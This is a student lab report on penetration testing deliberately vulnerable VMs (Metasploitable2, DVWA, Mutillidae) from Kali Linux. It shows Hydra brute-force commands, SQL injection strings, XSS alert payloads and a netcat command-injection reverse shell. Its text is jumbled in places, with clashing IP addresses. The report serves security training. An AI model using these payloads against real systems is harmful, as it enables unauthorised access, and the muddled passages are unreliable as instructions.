Linux Platform Security Development
Shiv Patel
Masters in Information System Security Management
Concordia University of Edmonton
spatel3@student.concordia.ab.ca
Abstract—Data storage is exceptionally critical today as
more and more classified information is being processed
securely on electronic devices, such as medical records, and such
devices linked to computer networks or internet service.
Software security and web-security play a crucial position
across the different aspects of cybersecurity. This includes
evaluating the reliability of systems and software apps that are
open to the outside world and thus possible targets of even more
attacks such as boundary violations, cross-site scripting,
command injections, and SQL-injections. The purpose of doing
penetration testing is to ensure that there is no protection
vulnerability in system and network that gives unauthorized
access to system and network. Penetration testing is one feasible
and effective method of avoiding system or network attacks.
This report summarizes some fundamentals of penetration
testing, review of existing exploits and resources on
Metapoitable VM.
Keywords— Penetration testing, vulnerabilities, security,
exploit.
I. INTRODUCTION
A variety of websites are created, public agencies,
educational organizations, and global companies have moved
from the centralized development/management approach built
separately for the website. With specific goals to develop and
operate a majority of sites via a single SaaS engine (Software
as a Service) or Application Leasing (ASP) process. The cloud
service environment includes several data vulnerability
delivery sites, a network operating system that utilizes a single
cow. Furthermore, there are also security problems and
accidents as the website runs.
Recently web innovation has overgrown in other areas of
life and work and has influenced people. Many day-to-day
tasks that involved face-to-face contact can now be carried out
on the Internet. Web services are essential elements of our
lives. These include such important things, such as financial
transactions, e-commerce, e-business, e-government, e-
procurement, e-education, and much more. According to a
positive technology(ptsecurity.com), nearly 82 percent of
bugs are in the application code. And cyber threats target
application vulnerability.
Penetration testing is a crucial strategy for evaluating the
robust, efficient, interconnected and trustworthy computing
base composed of software, hardware, and individuals.
Following diagram shows the basic process of penetration
testing:
information Vulnerabilities Vulnerability
Gathering analysis exploitation
Report Post
Generation exploitation
Fig 1. Basic Pen Testing Process.
The performance of a penetration check is dependent on
the analysis obtained and acquiring as much knowledge as
possible regarding the program and the applied infrastructure.
In this lab, I deployed a "Metasploitable" web application
development model and concentrated on crossing points
whereby client requests are approved, and complex data is
expressed. First, I checked these exposed areas for flaws such
as authorization, verification of inputs, session management
and leak of data. Depending on feedback created, I build
payloads in the form of errors and reply to any request to dump
the content of the database using SQL Injection, obtain a
reverse shell by injecting commands and stolen cookies using
Cross-Site Scripting.
II. METHODOLOGY-I
A. Getting Ready for the workplace
As to complete lab 3 need to make sure of some pre-
requirement as follows:
Install the VMWare Workstation on the system for
windows.
Download kali iso file and Metasploitable VM file.
I will set up two virtual machines running Kali Linux and
Metasploitable2 to do a vulnerability assessment and
penetration test.
Metasploitable VM setting it up: The virtual machine
Metasploitable is a deliberately insecure variant of Ubuntu
Linux intended to check protection software and illustrate
specific vulnerabilities. First, we need to access the
Metasploitable 2 virtual machine that includes the insecure
host system on which we will be training in the lab. Ensure I
have adequate space on your host network to mount the VM
and operate it. When you run Kali in a VM on the same
server, you need to provide at least 10 gigabytes of system
resources and optimal RAM for your host device, the
Metasploitable system, and Kali Linux. The Metasploitable 2
download can be found at Sourceforge. Once after loading
VM on VMware workstation, run it. Log in to the virtual
machine by using the credentials (Username: msfadmin,
Password: msfadmin). Using the ifconfig command to test if
DHCP was able to automatically accept an IP address from
my system. My Metasploitable VM's An IP address is
192.168.1.130.
Fig 2.Shows The Ip Address Of Metasploitable VM
 Kali Linux setup: Kali Linux is a powerful and
versatile operating system designed and built by Offensive
security, Kali Linux is primarily developed to simply to
satisfy the necessary criteria of fully qualified penetration
testing and security auditing. This provides pre-installed
vulnerability detection and penetration testing tools for
network traffic sniffing, efficiency threats, security analysis,
and many more. I downloaded Kali Linux from
https:/www.kali.org/downloads/, the official platform for
offensive security, and I built a few unique payloads to attack
earlier. I'm going to use Kali VM, but I'm going to migrate
from a Bridged Network framework to a NAT network. After
downloading Kali Linux, I issued it 40 GB of space and 8 GB
of RAM for a latency-free ride permanently. I started up my
Kali VM and used the ifconfig command to search its IP
address. The allocated IP address was 192.168.1.131.
Fig 3.Shows The Ip Address Of Kali VM
B. DVWA penetration testing using BurpSuite
DVWA: DVWA is a PHP / MYSQL coded DAMM
VULNERABLE WEB Application. It is far too fragile.
Ethical hackers test their expertise in this protection app and
use these resources in a secure setting. This also lets coders
grasp application security processes and teachers/students to
teach/learn to secure web applications in a safer
environment.DVWA's goal is to learn some of the most
prevalent weaknesses in the network, with specific degrees of
complexity. Older DVWA had four tiers of protection,
including Easy, Moderate, Hard and Impossible, but now
they're three rates, low, medium and high. I've carried out
numerous attacks at all stages of defence.
Burp Suite:Burp Suite is an advanced web application
security platform which is simple to use. Burp provides many
resources that are combined effortlessly, enabling you to
check any feature and element of modern web applications.
If you have to test the robustness of your authentication
system, the sameness of your session tokens, or the check
points for input validation found in your application,The
scanner tool tests for website configuration and bugs. The
proxy function involves updating, tracking and reissuing Post
queries. It operates in a proxy mode and can intercept both
HTTP requests and user replies. The attacker device assists
in executing custom attacks for automatic defence checking.
Burpsuite's pro edition has a lot of features but I never had
the chance to test them. It not only allows of in-depth manual
assessment, it also blends automated techniques to
summarise and evaluate tools for web applications.
Brute Force attack through Burpsuite: First of all, I
run all my VM's and I put 192.168.1.131 in the browser of
the kali where I could see Metasploitable's homepage for
bypass authentication. I clicked DVWA, which led me to the
DVWA website and modified the Low to High security level.
DVWA's default login credentials are admin and password,
because it's already a' vulnerable' web device, but I want to
bypass authentication with a brute force attack. I built a Burp
Suite project, and switched on the proxy tool intercept mode.
I've used a localhost proxy in my browser config. I can view
all http queries and replies by doing so, because each request
passes through my localhost and Burp intercepts and records
it.
Fig 4.Proxy Of A Browser.
After which, whenever I insert some context in the
username and password sector, Burp might decrypt the
request and I see the passwords in a non-encrypted plain text
in the fields of usernames and passwords. I picked the http
request and I went to the intruding tool where I stacked two
user-name and password fields in the form of a wordlist.
After the attack has been pushed, I noticed 36 requests
were redirected to the DVWA login page at the beginning of
the attack(Username 6x Password 6=36), 35 of those 36
requests had brute forces failed in duration 488 and only 1 had
the right attempt 4951.
Fig 5.Sucess Of Brute Force Attack.
Attack Brute Force with THC-Hydra:THC-Hydra is a
Kali Linux tool that can brutely break a remote authentication
service.To determine the system's admin name and user
password and we will use the hydra method to do so. A
username and password list is generated first for that. Hydra
is a simple and scalable password cracking tool that is used
in kali Linux, supporting numerous protocols. Now launch pwd that shows present direcory. I navigate to the following
the kali Linux terminal and set user.txt for username and website http:/192.168.1.131/dvwa/vulnerabilities/exec/.
password.txt for password, then I execute : hydra -L users.txt
-P passwords.txt ssh://192.168.1.131 -t 4

Fig 6. Shows Command Exection On DVWA.

Fig 5.Shows Hydra Code Execution.
SQL injection Attack: SQL Injection (SQLi) is a form
of injection attack where malicious SQL statements may be
performed. Such claims guide a web application supported by
a SQL database. Attackers can use vulnerabilities in SQL
Injection to override security measures in the app. Query
validation and parametrized questions with optimized
statements are the only secure way to avoid SQL Injection
attack. If SQL Injection is efficient, secret confidential data
such as database tables may be recovered, the database logic
modified, or even a backdoor accessed. While I was doing
SQL injection on the UserID location, I did so by making sure
that my SQL query performance is always TRUE. I utilized
"1 ' or 1=1 # "which results in 1, meaning Valid. I obtained
the user table information from the site. I used “ 1'OR 1 1=1
UNION SELECT NULL, TABLE NAME FROM
INFORMATION SCHEMA.TABLES # ” to learn the
database structure and database metadata. This order would
display all entries in the database, supplying us with the
database info.
Cross Site Scripting attack: Cross-Site (XSS), usually
seen in Web apps, is one form of computer security
vulnerability. XSS attacks allow hackers to implant client-
side scripts on the other client’s sites. There exist three kinds
of cross-site script attacks. Stored, Reflected and DOM-
based. I enhanced the security to medium to conduct an XXS
attack. After this, I was able to type anything in the name
field. To perform XXS, I used the script <button onClick=”
alert(‘this XSS’)”>Click</button>, which will pop up a
message box with this is XSS. Now every time someone
accesses this page, they will see the popup as it is stored on
the server.
I've used a tool named Netcraft to execute remote-code
execution that I am going to listen to 192.168.1.131 in Kali
Linux on port number 1234. 127.0.0.1 | nc 192.168.1.131
1234-e /bin/sh I used the input field on DVWA. This
command connects our metasploitable system to port 1234.
As I returned to my kali screen, I found that I could see the
files and directories in the current working directory by using
the ls button.
Fig 7. Show Remote Command Exaction On Kali Linux.
Upon accessing the network, a brute force attack must be
carried out to obtain the user's credentials. As we said, we need
to learn how a user named msfadmin, what is the user's
password so that they can sign in to the system. We used
Hydra and not DVWA in this situation to demonstrate brute
force. "Hydra-L users.txt-P passwords.txt ssh:/192.168.1.131-
t4" where -L is the logon names list, -p the passwords list and-
t which sets parallel to the function to be done, ssh:/
192.168.1.131 which is the target and protocol. After a while,
the amount of active logins is completed and shown to us."
Ssh msfadmin@192.168.1.131" is used when it requests a
password for msfadmin. As we know, the password that we
got at we will now use the Brutes Force attack with this ssh
order, and the metasploitable will be signed.

Remote Commnad exection: Command injection is an

attack to perform unauthorized commands on the host
operating system from a compromised application.
Command intrusion attacks are required when vulnerable
client data (forms, metadata, HTTP headers, etc.) is
forwarded from the device container through a programme.
Remote code execution is an intrusion in which the attacker
gets shell use of a system in which the web-based program is
hosting and can run code on the mobile client on the host
machine. In DVWA, I kept the degree of protection mild. To Fig 8.shows Metasploitable terminal through SSH
execute remote code, I used 192.168.1.131 on this link and
C. Penetration Testing On Mutillidae
SQLi-Extract Data: In this we will access to the
application Muttilidae. The admin account authentication
command “ ' 1 or1=1— ” has been issued. Anything that goes
beyond — in the command is a statement and 1=1 is often
used as the Real. We have all the data of the database which
inclues username,password and signature.

Fig 9.Show the SQL injection on Mutillidae.

XSS (cross-Site Scripting attack): The final attack

executed was XSS, when somebody tries to change the
background colour; the user's screen prompted an alert. In the
background colour section, where the appropriate
background colour is written in a text box, we write the
HTML script like <script>ALERT("hello xss
world")</script >. When the user executes it, he / she will
provide an warning box and it will show hello XSS world in
it.

Fig 10.Show The XSS attack On Mutillidae

III. CONCLUION